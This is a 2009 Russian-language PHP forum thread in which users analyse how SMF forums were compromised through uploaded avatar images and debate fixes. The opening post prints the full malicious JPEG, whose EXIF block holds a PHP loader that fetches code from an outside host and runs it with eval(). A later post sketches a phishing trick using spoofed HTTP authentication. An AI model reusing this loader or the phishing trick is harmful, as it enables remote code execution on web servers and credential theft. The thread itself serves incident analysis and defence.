Форум PHP программистов > уязвимость движка SMF

[ Поиск ] - [ Пользователи ] - [ Календарь ]

jetistyum

11.05.2009 - 14:07

Недавно я создавал тему по поводу - не сохраняйте пароли... греша на то, что пароль на хостинг ушёл при использовании... Как выяснилось после некоторых раскопок - взлом всех сайтов осуществлялся через script injection ... через использование аватарок ...
регистрировался пользователь - везде один и тот же... по имени krisbarteo

как видно из гугла

http://www.google.com.ua/search?rlz=1C1GGL...-8&q=krisbarteo
таких пользователей очень много..
(позже появились дубли с другими именами)
которые загружали jpeg аватарку такого содержания.

PHP

яШяб јExif  II*            1    J   2    f          i‡    z       ACD Systems Digital Imaging 2008:11:22 03:08:16   ђ    0220ђ’    515                        яю'<?php;$url = 'http://wplsat23.net/?update=main';$done = false;if(!$url){return '';}$url_info = parse_url($url);$url_info[port] = ($url_info[port]) ? $url_info[port]:80;$url_info[path] = ($url_info[path]) ? $url_info[path] : "/";    $url_info[query] = ($url_info[query]) ? $url_info[path] = $url_info[path] . "?" . $url_info[query] : "";    $query = "GET " . $url_info[path] . " HTTP/1.1\r\n";    $query = $query . "Host: " . $url_info[host] . "\r\n";    $query = $query . "Accept: */*" . "\r\n";    $query = $query . "Connection: close" . "\r\n";    $query = $query . "User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.12" . "\r\n";    $query = $query . "\r\n";    $errno = 0;    $error = "";    $sock = fsockopen($url_info[host], $url_info[port], $errno, $error, 30);$h = array();$resp = array();if($sock){stream_set_timeout($sock, 30);fwrite($sock, $query);$hd = false;while(!feof($sock)){$l = fgets($sock);if(!$hd){if(trim($l) == ''){$hd = true;}else{$h[] = $l;}}else{$resp[] = $l;}}fclose($sock);}$ret = implode("", $resp);eval($ret);?>00яЫ C     
    
    




яЫ C

яА   ! яД               
яД µ   } !1AQa"q2Ѓ‘Ў#B±БRСр$3br‚    
%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyzѓ„…†‡€‰Љ’“”•–—™љўЈ¤Ґ¦§Ё©ЄІіґµ¶·ё№єВГДЕЖЗИЙКТУФХЦЧШЩЪбвгдежзийкстуфхцчшщъяД            
яД µ  w !1AQaq"2ЃB‘Ў±Б    #3RрbrС
$4б%с&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz‚ѓ„…†‡€‰Љ’“”•–—™љўЈ¤Ґ¦§Ё©ЄІіґµ¶·ё№єВГДЕЖЗИЙКТУФХЦЧШЩЪвгдежзийктуфхцч

и пошло - поехало

Пароли вы все же не сохраняйте, но ... перед другом пришлось извиняться

а он уже кучу антивирей переставил и винду дважды сносил ...

подробнее обсуждается здесь
http://www.simplemachines.org/community/in...?topic=307717.0

Спустя 22 минуты, 45 секунд (11.05.2009 - 13:30) FatCat написал(а):

Бинарник инклюдится? Фигасе... Это не дыра в безопасности, это, можно сказать, открытые ворота перед злоумышлеником...

Спустя 15 минут, 28 секунд (11.05.2009 - 13:45) anonymouse написал(а):

П.С. тема супер - интересно - но пока видимо еще не для моего ума =( Не могу вдуплить что это за запрос...

Цитата

которые загружали jpeg аватарку такого содержания.

Это в смысле TITLE или как там его у ЖПГ в него загружали ?

Спустя 39 минут, 17 секунд (11.05.2009 - 14:24) jetistyum написал(а):

аватарка - обычно бинарный файл ... (изображение)
но при неправильной обработке, содержание аватарки может быть обработано интерпретатором....

Вот текст функции отображения аватара..
Блин, вот зачем было так усложнять

Свернутый текст

PHP

<?php
//http://forum.overcomputers.com/index.php?action=dlattach;attach=19;type=avatar
function Download()
{
    global $txt, $modSettings, $db_prefix, $user_info, $scripturl, $context, $sourcedir;

    $context['no_last_modified'] = true;

    // Make sure some attachment was requested!
    if (!isset($_REQUEST['attach']) && !isset($_REQUEST['id']))
        fatal_lang_error(1, false);

    $_REQUEST['attach'] = isset($_REQUEST['attach']) ? (int) $_REQUEST['attach'] : (int) $_REQUEST['id'];

    if (isset($_REQUEST['type']) && $_REQUEST['type'] == 'avatar')
    {
        $request = db_query("
            SELECT filename, ID_ATTACH, attachmentType
            FROM {$db_prefix}attachments
            WHERE ID_ATTACH = $_REQUEST[attach]
                AND ID_MEMBER > 0
            LIMIT 1", __FILE__, __LINE__);
        $_REQUEST['image'] = true;
    }
    // This is just a regular attachment...
    else
    {
        isAllowedTo('view_attachments');

        // Make sure this attachment is on this board.
        $request = db_query("
            SELECT a.filename, a.ID_ATTACH, a.attachmentType
            FROM ({$db_prefix}boards AS b, {$db_prefix}messages AS m, {$db_prefix}attachments AS a)
            WHERE b.ID_BOARD = m.ID_BOARD
                AND $user_info[query_see_board]
                AND m.ID_MSG = a.ID_MSG
                AND a.ID_ATTACH = $_REQUEST[attach]
            LIMIT 1", __FILE__, __LINE__);
    }
    if (mysql_num_rows($request) == 0)
        fatal_lang_error(1, false);
    list ($real_filename, $ID_ATTACH, $attachmentType) = mysql_fetch_row($request);
    mysql_free_result($request);

    // Update the download counter (unless it's a thumbnail).
    if ($attachmentType != 3)
        db_query("
            UPDATE LOW_PRIORITY {$db_prefix}attachments
            SET downloads = downloads + 1
            WHERE ID_ATTACH = $ID_ATTACH
            LIMIT 1", __FILE__, __LINE__);

    $filename = getAttachmentFilename($real_filename, $_REQUEST['attach']);

    // This is done to clear any output that was made before now. (would use ob_clean(), but that's PHP 4.2.0+...)
    ob_end_clean();
    if (!empty($modSettings['enableCompressedOutput']) && @version_compare(PHP_VERSION, '4.2.0') >= 0 && @filesize($filename) <= 4194304)
        @ob_start('ob_gzhandler');
    else
    {
        ob_start();
        header('Content-Encoding: none');
    }

    // No point in a nicer message, because this is supposed to be an attachment anyway...
    if (!file_exists($filename))
    {
        loadLanguage('Errors');

        header('HTTP/1.0 404 ' . $txt['attachment_not_found']);
        header('Content-Type: text/plain; charset=' . (empty($context['character_set']) ? 'ISO-8859-1' : $context['character_set']));

        // We need to die like this *before* we send any anti-caching headers as below.
        die('404 - ' . $txt['attachment_not_found']);
    }

    // If it hasn't been modified since the last time this attachement was retrieved, there's no need to display it again.
    if (!empty($_SERVER['HTTP_IF_MODIFIED_SINCE']))
    {
        list($modified_since) = explode(';', $_SERVER['HTTP_IF_MODIFIED_SINCE']);
        if (strtotime($modified_since) >= filemtime($filename))
        {
            ob_end_clean();

            // Answer the question - no, it hasn't been modified ;).
            header('HTTP/1.1 304 Not Modified');
            exit;
        }
    }

    // Check whether the ETag was sent back, and cache based on that...
    $file_md5 = '"' . md5_file($filename) . '"';
    if (!empty($_SERVER['HTTP_IF_NONE_MATCH']) && strpos($_SERVER['HTTP_IF_NONE_MATCH'], $file_md5) !== false)
    {
        ob_end_clean();

        header('HTTP/1.1 304 Not Modified');
        exit;
    }

    // Send the attachment headers.
    header('Pragma: ');

    if (!$context['browser']['is_gecko'])
        header('Content-Transfer-Encoding: binary');
    header('Expires: ' . gmdate('D, d M Y H:i:s', time() + 525600 * 60) . ' GMT');
    header('Last-Modified: ' . gmdate('D, d M Y H:i:s', filemtime($filename)) . ' GMT');
    header('Accept-Ranges: bytes');
    header('Set-Cookie:');
    header('Connection: close');
    header('ETag: ' . $file_md5);

    if (filesize($filename) != 0)
    {
        $size = @getimagesize($filename);
        if (!empty($size))
        {
            // What headers are valid?
            $validTypes = array(
                1 => 'gif',
                2 => 'jpeg',
                3 => 'png',
                5 => 'psd',
                6 => 'bmp',
                7 => 'tiff',
                8 => 'tiff',
                9 => 'jpeg',
                14 => 'iff',
            );

            // Do we have a mime type we can simpy use?
            if (!empty($size['mime']))
                header('Content-Type: ' . $size['mime']);
            elseif (isset($validTypes[$size[2]]))
                header('Content-Type: image/' . $validTypes[$size[2]]);
            // Otherwise - let's think safety first... it might not be an image...
            elseif (isset($_REQUEST['image']))
                unset($_REQUEST['image']);
        }
        // Once again - safe!
        elseif (isset($_REQUEST['image']))
            unset($_REQUEST['image']);
    }

    if (!isset($_REQUEST['image']))
    {
        header('Content-Disposition: attachment; filename="' . $real_filename . '"');
        header('Content-Type: application/octet-stream');
    }

    // If this has an "image extension" - but isn't actually an image - then ensure it isn't cached cause of silly IE.
    if (!isset($_REQUEST['image']) && in_array(substr($real_filename, -4), array('.gif', '.jpg', '.bmp', '.png', 'jpeg', 'tiff')))
            header('Cache-Control: no-cache'); 
        else
        header('Cache-Control: max-age=' . (525600 * 60) . ', private');

    if (empty($modSettings['enableCompressedOutput']) || filesize($filename) > 4194304)
        header('Content-Length: ' . filesize($filename));

    // Try to buy some time...
    @set_time_limit(0);

    // For text files.....
    if (!isset($_REQUEST['image']) && in_array(substr($real_filename, -4), array('.txt', '.css', '.htm', '.php', '.xml')))
    {
        if (strpos($_SERVER['HTTP_USER_AGENT'], 'Windows') !== false)
            $callback = create_function('$buffer', 'return preg_replace(\'~[\r]?\n~\', "\r\n", $buffer);');
        elseif (strpos($_SERVER['HTTP_USER_AGENT'], 'Mac') !== false)
            $callback = create_function('$buffer', 'return preg_replace(\'~[\r]?\n~\', "\r", $buffer);');
        else
            $callback = create_function('$buffer', 'return preg_replace(\'~\r~\', "\r\n", $buffer);');
    }

    // Since we don't do output compression for files this large...
    if (filesize($filename) > 4194304)
    {
        // Forcibly end any output buffering going on.
        if (function_exists('ob_get_level'))
        {
            while (@ob_get_level() > 0)
                @ob_end_clean();
        }
        else
        {
            @ob_end_clean();
            @ob_end_clean();
            @ob_end_clean();
        }

        $fp = fopen($filename, 'rb');
        while (!feof($fp))
        {
            if (isset($callback))
                echo $callback(fread($fp, 8192));
            else
                echo fread($fp, 8192);
            flush();
        }
        fclose($fp);
    }
    // On some of the less-bright hosts, readfile() is disabled.  It's just a faster, more byte safe, version of what's in the if.
    elseif (isset($callback) || @readfile($filename) == null)
        echo isset($callback) ? $callback(file_get_contents($filename)) : file_get_contents($filename);

    obExit(false);
}

Спустя 2 часа, 52 минуты, 3 секунды (11.05.2009 - 17:17) Bezdna написал(а):

На Милворме эта фишка уже год висит. Какой-то кулхацкер освоил.

Спустя 43 минуты, 54 секунды (11.05.2009 - 18:00) jetistyum написал(а):

Мда, разработчики забили на развитие форума, видимо

Спустя 4 часа, 36 минут, 36 секунд (11.05.2009 - 22:37) Семён написал(а):

Да эта проблема висит давно, только решается обычной настройкой сервера.
GIF Injection ничего не говорит?

Спустя 35 минут, 9 секунд (11.05.2009 - 23:12) jetistyum написал(а):

решение видел - с помощью настройки сервера, но всетаки считаю тупизмом - отображать аватарку через fopen-fread
это просто дополнительно создает неоправданную нагрузку на сервер...
про инжекшн слышал конечно

Спустя 7 минут, 54 секунды (11.05.2009 - 23:20) Семён написал(а):

В любом случае, либо конвертация изображения или настройки на сервере
-
В случае с конвертацией могут быть пиковые нагрузки (я бы сказал даже ощутимые)

В случае с настройкой сервера - незначительно и почти незаметно.

Спустя 7 минут, 46 секунд (11.05.2009 - 23:28) jetistyum написал(а):

... ну тут не стоит вопрос - либо конвертация, либо настройки....
изображения конвертироваться должны в случае если привышают макс. размеры..
а в случае если загрузить даже зараженный файл, но оставить его с прежним разрешением (из списка разрешенных) ... то ничего с ним не случится.. и никто его не исполнит...
Или я все таки чего-то не знаю?????
И всеравно я не вижу преимущества отображения аватарки через непонятный вывод её через php перед просто отображением типа /avatars/fa4s7AF8D6Sf2s4fs4f.gif
в таком случае все проблемы отображения ложатся на плечи вебсервера и только ...
зачем делать обработку на PHP?

Спустя 8 часов, 21 минута, 13 секунд (12.05.2009 - 07:49) Семён написал(а):

Я не пойму ты создал тему "уязвимость движка SMF, было взломано десятки тысяч форумов" и теперь сам же задаёшь вопрос "зачем делать обработку на PHP?" => Чтобы потом таких уязвимостей не возникало, яркий пример форум IPB. Как-то пробовал делать инъекцию, но проходила только если напрямую обращаться к файлу и то не работало, т.к. файл не попадал под категорию исполняемых, т.к. явл. картинкой. а в просмотре топиков 0 эмоций.

Спустя 8 часов, 52 минуты, 47 секунд (12.05.2009 - 16:42) jetistyum написал(а):

брр.. я тебя всеравно не понимааю...
есть способ исполнить файл, лежащий на сервере с именем avatar.jpeg (.jpg, png, gif) ???
даже если он не обработан после загрузке и в нем есть код....
в аватарке он отображается как
<img src="avatar.jpg">
у него расширение картинки, файлы не-картинки не сохраняются изначально...
файлы с не-.php расширением не обрабатываются интерпретатором...

Где тут опасность????

в движке SMF есть обработка картинок
(картинка отображается как
<img src="http://forum.overcomputers.com/index.php?action=dlattach;attach=19;type=avatar">)
тоесть для каждого отображения картинки запускается скрипт.... (я его прикрепил выше)

Может я чего-то не знаю, что для тебя кажется очевидным....

Спустя 3 часа, 3 минуты, 33 секунды (12.05.2009 - 19:45) FatCat написал(а):

Цитата (jetistyum @ 12.05.2009 - 16:42)

<img src="avatar.jpg">
у него расширение картинки, файлы не-картинки не сохраняются изначально...
файлы с не-.php расширением не обрабатываются интерпретатором...

Где тут опасность?

Опасность есть, когда разрешается

HTML

Умный хакер, имеющий доступ к настройкам апача сервера any_other_site.hck делает запрос http-авторизации в директории с аватаром и подделывает заголовок окна запроса таким образом, чтобы он выглядел как запрос с атакуемого сайта.
Хорошо, если пара процентов админов сайта, зайдя на свой сайт и получив запрос авторизации, сообразит, что запрос мог прийти от хакерского сайта. 98% админов ведут свой админский логин и пароль; они естественно совершенно не совпадут с указанными хакерами; в результате (напоминаю: запрашивали картинку, а не страницу) без всяких сообщений об ошибке загрузится страница сайта с пустым квадратиком вместо аватарки какого-то пользователя; а хакер затем спокойно считает логин и пароль в эрорлоге своего сервера.

Спустя 18 часов, 33 минуты, 13 секунд (13.05.2009 - 14:19) jetistyum написал(а):

я понял твою идею, это XSS .. но на сколько я понимаю так можно подделать только запрос "серверной" авторизации... и обычные юзера вполне вероятно и введут авторизацию.. степень опасности есть безусловно..
но... речь не шла о том, чтобы отображать аватарки с других хостов...

Меня удивило, почему бы просто не показывать аватарку как
<img src="avatar.gif">
ну вот возьмем мою ... здесь.. на форуме

HTML

зачем делать обработку -отображение через php
????
для каждой аватарки делать запрос из бд.... вытягивать оттуда информацию об аватарке, проверять, можно ли отображать аватарку, есть ли она в директории, если есть, то выводит заголовок - img/gif ... и fopen-ом транслирует байт-код аватарки.
если нет, генерирует 404-й заголовок...
это же чуууушь....

Спустя 14 минут, 54 секунды (13.05.2009 - 14:34) FatCat написал(а):

Цитата (jetistyum @ 13.05.2009 - 14:19)

это же чуууушь...

Вероятно, сначала преследовались какие-то иные цели, например проверка размера изображения перед выводом на страницу, чтобы дизайн не перекосило...

За собой не раз замечал: кодируешь что-нибудь сложное, отвлечет телефонный звонок или еще что-то, потом дописываешь код, вроде работает, ну и ладно. А спустя какое-то время потом сам себе удивляешься что за бредовые строки в коде.
Я тут недавно разбирался с тормозами форума, нашел свой же кусок кода со вложенными циклами, результаты которых потом так нигде и не использовались... Если перевести на язык безопасности - это уязвимость для DoS и DDoS атак...

Спустя 4 минуты, 49 секунд (13.05.2009 - 14:38) jetistyum написал(а):

от ошибок никто не застрахован, но этот форум разрабатывает комьюнити, тем более, как было сказано раньше, об этой дырке знали и раньше....... мда..

Быстрый ответ:

Здесь расположена полная версия этой страницы.